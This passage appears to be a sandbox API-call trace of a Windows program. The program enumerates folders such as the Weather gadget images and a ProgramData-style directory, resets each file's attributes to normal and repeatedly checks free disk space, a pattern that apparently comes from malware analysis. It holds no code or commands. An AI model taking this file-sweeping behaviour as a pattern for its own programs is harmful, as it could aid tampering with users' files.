lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.544] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.546] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.551] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.553] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.557] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.559] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1a1764a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1a1764a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.559] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe19c11c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbe19c11c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbe19c11c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x28c, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)alertIcon.png", cAlternateFileName="")) returned 1 [0135.559] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf02919, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf02919, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1c227c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)grayStateIcon.png", cAlternateFileName="")) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf28a78, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf28a78, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1c227c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)greenStateIcon.png", cAlternateFileName="")) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf28a78, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf28a78, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1e83dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)notConnectedStateIcon.png", cAlternateFileName="")) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf4ebd7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf4ebd7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1e83dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)redStateIcon.png", cAlternateFileName="")) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf4ebd7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf4ebd7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1e83dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)redStateIcon.png", cAlternateFileName="")) returned 0 [0135.560] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.560] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.561] CoTaskMemFree (pv=0x4e1c10) [0135.562] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.562] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe38b2fc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbe38b2fc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbe38b2fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)alertIcon.png", cAlternateFileName="")) returned 1 [0135.562] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc26e8a2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc26e8a2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3b145c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)grayStateIcon.png", cAlternateFileName="")) returned 1 [0135.563] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3d75bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)greenStateIcon.png", cAlternateFileName="")) returned 1 [0135.563] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3fd71c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)notConnectedStateIcon.png", cAlternateFileName="")) returned 1 [0135.563] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc306e1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc306e1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3fd71c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)redStateIcon.png", cAlternateFileName="")) returned 1 [0135.563] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.569] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.574] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png", dwFileAttributes=0x80) returned 0 [0135.576] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.581] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.588] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.595] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.602] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1a1e88c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1a1e88c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe38b2fc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbe38b2fc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbe38b2fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)alertIcon.png", cAlternateFileName="")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc26e8a2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc26e8a2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3b145c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)grayStateIcon.png", cAlternateFileName="")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3d75bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)greenStateIcon.png", cAlternateFileName="")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3fd71c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)notConnectedStateIcon.png", cAlternateFileName="")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc306e1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc306e1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3fd71c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)redStateIcon.png", cAlternateFileName="")) returned 1 [0135.605] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc306e1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc306e1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe3fd71c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="(144DPI)redStateIcon.png", cAlternateFileName="")) returned 0 [0135.605] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.605] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.605] CoTaskMemFree (pv=0x4e1c10) [0135.605] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.606] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0135.606] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.606] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0135.606] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.606] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.607] CoTaskMemFree (pv=0x4e1c10) [0135.607] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.607] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0135.607] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0135.607] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0135.608] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", 